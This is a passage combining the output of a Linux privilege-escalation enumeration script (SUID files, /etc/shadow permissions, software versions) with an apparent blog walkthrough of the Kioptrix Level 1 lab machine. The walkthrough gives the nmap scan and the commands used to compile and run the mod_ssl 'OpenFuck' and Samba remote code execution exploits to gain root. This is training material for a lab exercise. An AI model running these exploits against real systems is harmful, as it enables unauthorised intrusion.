-rwxr-xr-x   1 root root    16898 May  2  2007 diskdump
-rwxr-xr-x   1 root root      968 Feb 21  2005 dund
-rwxr-xr-x   1 root root    10799 Nov 20  2006 functions
-rwxr-xr-x   1 root root     1778 May 17  2006 gpm
-rwxr-xr-x   1 root root     1388 May  2  2007 haldaemon
-rwxr-xr-x   1 root root     6028 Jan 15  2007 halt
-rwxr-xr-x   1 root root     1001 Feb 21  2005 hidd
-rwxr-xr-x   1 root root     3201 May  4  2007 httpd
-rwxr-xr-x   1 root root    13763 May  3  2007 ipmi
-rwxr-xr-x   1 root root     7135 Feb 21  2005 iptables
-rwxr-xr-x   1 root root     1487 Feb 21  2005 irda
-rwxr-xr-x   1 root root     1949 May  2  2007 irqbalance
-rwxr-xr-x   1 root root     6183 Feb 21  2005 isdn
-rwxr-xr-x   1 root root      200 Sep 27  2006 keytable
-rwxr-xr-x   1 root root      652 Sep  3  2003 killall
-rwxr-xr-x   1 root root     2095 May  2  2007 kudzu
-rwxr-xr-x   1 root root     1906 May  5  2007 lvm2-monitor
-rwxr-xr-x   1 root root     1700 May  3  2007 mdmonitor
-rwxr-xr-x   1 root root     1613 May  3  2007 mdmpd
-rwxr-xr-x   1 root root     1746 May  3  2007 messagebus
-rwxr-xr-x   1 root root     1731 May  2  2007 microcode_ctl
-rwxr-xr-x   1 root root     4235 Jul 25  2008 mysqld
-rwxr-xr-x   1 root root    12198 May  2  2007 netdump
-rwxr-xr-x   1 root root     7422 Nov 20  2006 netfs
-rwxr-xr-x   1 root root     1303 May  2  2007 netplugd
-rwxr-xr-x   1 root root     8543 Apr 18  2006 network
-rwxr-xr-x   1 root root     1454 May  3  2007 NetworkManager
-rwxr-xr-x   1 root root     4344 May  3  2007 nfs
-rwxr-xr-x   1 root root     3274 May  3  2007 nfslock
-rwxr-xr-x   1 root root     2171 May  2  2007 nscd
-rwxr-xr-x   1 root root     3586 May  5  2007 ntpd
-rwxr-xr-x   1 root root    17713 May  3  2007 openibd
-rwxr-xr-x   1 root root     1144 Feb 21  2005 pand
-rwxr-xr-x   1 root root     4431 Mar  8  2006 pcmcia
-rwxr-xr-x   1 root root     1877 Feb 21  2005 portmap
-rwxr-xr-x   1 root root     1021 Jan 17  2007 psacct
-rwxr-xr-x   1 root root     2404 Oct 18  2004 rawdevices
-rwxr-xr-x   1 root root     1387 May  2  2007 rdisc
-rwxr-xr-x   1 root root      790 May  2  2007 readahead
-rwxr-xr-x   1 root root      795 May  2  2007 readahead_early
-rwxr-xr-x   1 root root     1777 May  3  2007 rhnsd
-rwxr-xr-x   1 root root     2177 May  3  2007 rpcgssd
-rwxr-xr-x   1 root root     1805 May  3  2007 rpcidmapd
-rwxr-xr-x   1 root root     2153 May  3  2007 rpcsvcgssd
-rwxr-xr-x   1 root root     1547 Feb 21  2005 saslauthd
-rwxr-xr-x   1 root root     3349 May  2  2007 sendmail
-rwxr-xr-x   1 root root     1175 Jul 10  2002 single
-rwxr-xr-x   1 root root     2247 May  2  2007 smartd
-rwxr-xr-x   1 root root     3282 May  4  2007 squid
-rwxr-xr-x   1 root root     3105 May  2  2007 sshd
-rwxr-xr-x   1 root root     1369 Feb 21  2005 syslog
-rwxr-x---   1 root pegasus  2321 Aug 12  2006 tog-pegasus
-rwxr-xr-x   1 root root     2796 Feb 21  2005 tux
-rwxr-xr-x   1 root root     1880 Aug 12  2006 vsftpd
-rwxr-xr-x   1 root root     1548 Feb 15  2007 winbind
-rwxr-xr-x   1 root root     1650 May  2  2007 wpa_supplicant
-rwxr-xr-x   1 root root     3607 May  3  2007 xfs
-rwxr-xr-x   1 root root     2497 Aug 21  2005 xinetd
-rwxr-xr-x   1 root root     2822 May  2  2007 ypbind
-rwxr-xr-x   1 root root     1036 May  5  2007 yum


[00;33m### SOFTWARE #############################################[00m
[00;31m[-] Sudo version:[00m
Sudo version 1.6.7p5


[00;31m[-] MYSQL version:[00m
mysql  Ver 14.7 Distrib 4.1.22, for redhat-linux-gnu (i686) using readline 4.3


[00;31m[-] Apache version:[00m
Server version: Apache/2.0.52
Server built:   May  4 2007 06:25:03


[00;33m### INTERESTING FILES ####################################[00m
[00;31m[-] Useful file locations:[00m
/usr/bin/wget
/usr/bin/nmap
/usr/bin/gcc
/usr/bin/curl


[00;31m[-] Can we read/write sensitive files:[00m
-rw-r--r--  1 root root 1772 Oct 12  2009 /etc/passwd
-rw-r--r--  1 root root 638 Oct 12  2009 /etc/group
-rw-r--r--  1 root root 842 May 24  2004 /etc/profile
-r--------  1 root root 1141 Oct 12  2009 /etc/shadow


[00;31m[-] SUID files:[00m
-r-sr-xr-x  1 root root 46076 May  2  2007 /sbin/unix_chkpwd
-r-s--x--x  1 root root 20016 May  2  2007 /sbin/pam_timestamp_check
-r-sr-xr-x  1 root root 301242 May  2  2007 /sbin/pwdb_chkpwd
-rwsr-xr-x  1 root root 6096 May  2  2007 /usr/sbin/ccreds_validate
-rws--x--x  1 root root 30760 May  2  2007 /usr/sbin/userhelper
-rwsr-xr-x  1 root root 6668 Feb 21  2005 /usr/sbin/userisdnctl
-r-s--x---  1 root apache 10760 May  4  2007 /usr/sbin/suexec
-rwsr-xr-x  1 root root 15228 May  3  2007 /usr/sbin/usernetctl
-rws--x--x  1 root root 434644 May  2  2007 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x  1 root root 7396 May  2  2007 /usr/libexec/pt_chown
-rwsr-xr-x  1 root root 123961 May  3  2007 /usr/kerberos/bin/ksu
-rwsr-x---  1 root squid 9952 May  4  2007 /usr/lib/squid/pam_auth
-rwsr-x---  1 root squid 10208 May  4  2007 /usr/lib/squid/ncsa_auth
-rws--x--x  1 root root 18392 May  3  2007 /usr/bin/chsh
-rwsr-xr-x  1 root root 17304 May 10  2006 /usr/bin/rcp
---s--x--x  1 root root 93816 Aug 21  2005 /usr/bin/sudo
-rwsr-xr-x  1 root root 117802 May  2  2007 /usr/bin/chage
-rwsr-xr-x  1 root root 82772 Jul 12  2006 /usr/bin/crontab
-rwsr-xr-x  1 root root 12312 May 10  2006 /usr/bin/rlogin
-rwsr-xr-x  1 root root 8692 May 10  2006 /usr/bin/rsh
-rwsr-xr-x  1 root root 131181 May  2  2007 /usr/bin/gpasswd
-rwsr-xr-x  1 root root 42280 Apr 26  2006 /usr/bin/at
-rws--x--x  1 root root 7700 May  3  2007 /usr/bin/newgrp
-rws--x--x  1 root root 17708 May  3  2007 /usr/bin/chfn
-rwsr-xr-x  1 root root 19597 May  3  2007 /usr/bin/lppasswd
-rwsr-xr-x  1 root root 72261 May  2  2007 /usr/bin/sg
-r-s--x--x  1 root root 21200 Aug 21  2005 /usr/bin/passwd
-rwsr-xr-x  1 root root 87016 May  3  2007 /bin/mount
-rwsr-xr-x  1 root root 12300 May  2  2007 /bin/traceroute6
-rwsr-xr-x  1 root root 23844 Nov 23  2006 /bin/traceroute
-rwsr-xr-x  1 root root 53612 May  3  2007 /bin/umount
-rwsr-xr-x  1 root root 30924 May  2  2007 /bin/ping6
-rwsr-xr-x  1 root root 33272 May  2  2007 /bin/ping
-rwsr-xr-x  1 root root 61168 May  5  2007 /bin/su


[00;31m[-] SGID files:[00m
-rwxr-Sr-t  1 root root 1733 Feb  9  2012 /var/www/html/index.php
-rwxr-Sr-t  1 root root 199 Oct  8  2009 /var/www/html/pingit.php
-rwxr-sr-x  1 root root 11367 May  3  2007 /sbin/netreport
-rwxr-sr-x  1 root lock 15372 Apr  4  2006 /usr/sbin/lockdev
-rwxr-sr-x  1 root smmsp 746328 May  2  2007 /usr/sbin/sendmail.sendmail
-rwxr-sr-x  1 root utmp 10497 Feb 21  2005 /usr/sbin/utempter
-r-xr-sr-x  1 root tty 9752 May  5  2007 /usr/bin/wall
-rwxr-sr-x  1 root slocate 38548 Aug 21  2005 /usr/bin/slocate
-rwxr-sr-x  1 root mail 14636 Feb 21  2005 /usr/bin/lockfile
-rwxr-sr-x  1 root tty 10124 May  3  2007 /usr/bin/write
-rwxr-sr-x  1 root nobody 57932 May  2  2007 /usr/bin/ssh-agent


[00;33m[+] Possibly interesting SGID files:[00m
-rwxr-Sr-t  1 root root 1733 Feb  9  2012 /var/www/html/index.php
-rwxr-Sr-t  1 root root 199 Oct  8  2009 /var/www/html/pingit.php


[00;31m[-] NFS config details: [00m
-rw-r--r--  1 root root 0 Jan 12  2000 /etc/exports


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
-rw-r--r--  1 root root 694 Feb 21  2005 /etc/syslog.conf
-rw-r--r--  1 root root 401 May  5  2007 /etc/yum.conf
-rwxr-xr-x  1 root root 1484 Jan  1  2006 /etc/request-key.conf
-rw-r--r--  1 root root 10 Oct  7  2009 /etc/pam_smb.conf
-rw-r--r--  1 root root 1623 Oct  7  2009 /etc/nsswitch.conf
-rw-r--r--  1 root root 658 May  3  2007 /etc/initlog.conf
-rw-r--r--  1 root root 216 May  3  2007 /etc/sestatus.conf
-rw-r--r--  1 root root 28 May  2  2007 /etc/ld.so.conf
-rw-r--r--  1 root root 3243 Feb 21  2005 /etc/lftp.conf
-rw-r--r--  1 root root 10814 Feb 20  2006 /etc/ltrace.conf
-rw-r--r--  1 root root 23735 Feb 21  2005 /etc/webalizer.conf
-rw-r--r--  1 root root 604 May  3  2007 /etc/sysctl.conf
-rw-r--r--  1 root root 585 Oct  7  2009 /etc/yp.conf
-rw-r--r--  1 root root 1895 May  2  2007 /etc/nscd.conf
-rw-r--r--  1 root root 3058 Oct  7  2009 /etc/smartd.conf
-rw-r-----  1 root root 450 May  2  2007 /etc/auditd.conf
-rw-r--r--  1 root root 117 Dec 18 23:24 /etc/resolv.conf
-rw-r--r--  1 root root 23488 Feb 21  2005 /etc/jwhois.conf
-rw-r--r--  1 root root 134 May  2  2007 /etc/pwdb.conf
-rw-r--r--  1 root root 2281 Oct  7  2009 /etc/krb.conf
-rw-r--r--  1 root root 296 Aug 21  2005 /etc/updatedb.conf
-rw-r--r--  1 root root 833 Aug 13  2006 /etc/gssapi_mech.conf
-rw-r--r--  1 root root 505 Oct 20  2006 /etc/logrotate.conf
-rw-r--r--  1 root root 17 Jul 23  2000 /etc/host.conf
-rw-r--r--  1 root root 2657 May  2  2007 /etc/warnquota.conf
-rw-r--r--  1 root root 615 Oct  7  2009 /etc/krb5.conf
-rw-r--r--  1 root root 759 Jun  1  2009 /etc/pear.conf
-rw-r--r--  1 root root 153 Feb 21  2005 /etc/esd.conf
-rw-r--r--  1 root root 1983 Feb 21  2005 /etc/mtools.conf
-rw-r--r--  1 root root 463 May  2  2007 /etc/cpuspeed.conf
-rw-r--r--  1 root root 2374 Oct  7  2009 /etc/libuser.conf
-rw-r--r--  1 root root 2434 May  5  2007 /etc/ntp.conf
-rw-r--r--  1 root root 821 Oct  1  2004 /etc/prelink.conf
-rw-r--r--  1 root root 1756 May 17  2006 /etc/gpm-root.conf
-rw-r--r--  1 root root 177 May  3  2007 /etc/idmapd.conf
-rw-r--r--  1 root root 0 Feb 21  2005 /etc/wvdial.conf
-rw-r--r--  1 root root 8738 Oct  7  2009 /etc/ldap.conf
-rw-r--r--  1 root root 51 Oct 12  2009 /etc/modprobe.conf
-rw-r--r--  1 root root 289 Aug 21  2005 /etc/xinetd.conf


[00;31m[-] Location and Permissions (if accessible) of .bak file(s):[00m
-r--r--r--  1 root root 1243 Aug 16  2003 /usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/Filter/exec.pm.bak
-r--r--r--  1 root root 1471 Aug 16  2003 /usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/Filter/sh.pm.bak
-r--r--r--  1 root root 2181 Aug 16  2003 /usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/Filter/cpp.pm.bak
-rw-r--r--  1 root root 47 Oct 10  2009 /etc/issue.bak


[00;31m[-] Any interesting mail in /var/mail:[00m
lrwxrwxrwx  1 root root 10 Oct  7  2009 /var/mail -> spool/mail


[00;33m### SCAN COMPLETE ####################################[00m

OSCP like Vulnhub machines: Kioptrix: Level 1 (#1)

Kudos to abatchy’s blog for compiling this list.

Download VM

Let’s start the enumeration with nmap.

nmap -sCV -v -oA tcp 192.168.1.8

And we got the following output.

# Nmap 7.80 scan initiated Sat Dec 12 01:55:02 2020 as: nmap -sCV -v -oN tcp 192.168.1.8
Nmap scan report for 192.168.1.8
Host is up (0.0032s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-12-12T07:57:57+00:00; +1h01m49s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:00:00:00:00:00(VMware)

Host script results:
|_clock-skew: 1h01m48s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX<00>         Flags: <unique><active>
|   KIOPTRIX<03>         Flags: <unique><active>
|   KIOPTRIX<20>         Flags: <unique><active>
|   MYGROUP<00>          Flags: <group><active>
|_  MYGROUP<1e>          Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 12 01:57:08 2020 -- 1 IP address (1 host up) scanned in 126.36 seconds

Now, there are at least two ways to root this machine.

Method #1

I have found port 80 and port 443 open. But upon closer inspection and some directory bruteforcing with gobuster, i felt that it is a rabbit hole. However, notice the banner of the webserver. It says the server version as Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

On searchsploit-ing the mod_ssl version, we got a potential match.

With some trial and error, I’ve found a working exploit; which is Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2).

The exploit was compiled with the following command as instructed in the exploit code.

gcc -o OpenFuck 47080.c -lcrypto

Upon compiling the exploit, I’ve found out that the exploit requires the exact version number of Apache. The exploit requires the a hexadecimal number corresponding to our linux distribution and apache version.

I have found the linux version as Redhat and the Apache version as 1.3.20.

From the above list, the hex number I needed is 0x6b. The syntax to execute the exploit is as follows, where 443 is the port number and -c 40 is used to mention the number of connections required (Didn’t think it was required at least in our case).

./OpenFuck 0x6b 192.168.1.8 443 -c 40

And we have the root shell!

Method #2

Now the next exploitation method is a little bit tricky. The vulnerability is in the samba package, but the SMB version is (kind of) hidden and we have to manually enumerate the SMB version.

Usually, to enumerate SMB version manually, we can rely on smb version enumeration scripts like this or this. If they aren’t working as they should be, then we can always use wireshark to manually enumerate the version by using display filters like,

smb and ip.src=={IP}

and look at the TCP stream.

As we can see, there is no version information in the SMB response.

So, let’s manually enumerate the SMB version using a google dork.

apache 1.3.20 site:rpm.pbone.net

Where rpm.pbone.net is the website that has the details about packages in Redhat linux.

We’ve got the date from the package. We can use wikipedia’s Redhat’s version history page to find the version of Redhat.

We’ve got the Redhat version as 7.2, since the date it released is around the date we’ve discovered in rpm.pbone.net.

Performing a google search with the redhat version has presented us with the following information.

Using searchsploit presented the following information.

The exploit we are looking for is the Remote code execution one. I compiled it with

gcc 10.c -o samba

and ran it with the following command

./samba -b 0 -v 192.168.1.8

where -b 0 specifies the platform and -v is used for verbose output.

And Viola!

We are root. Again!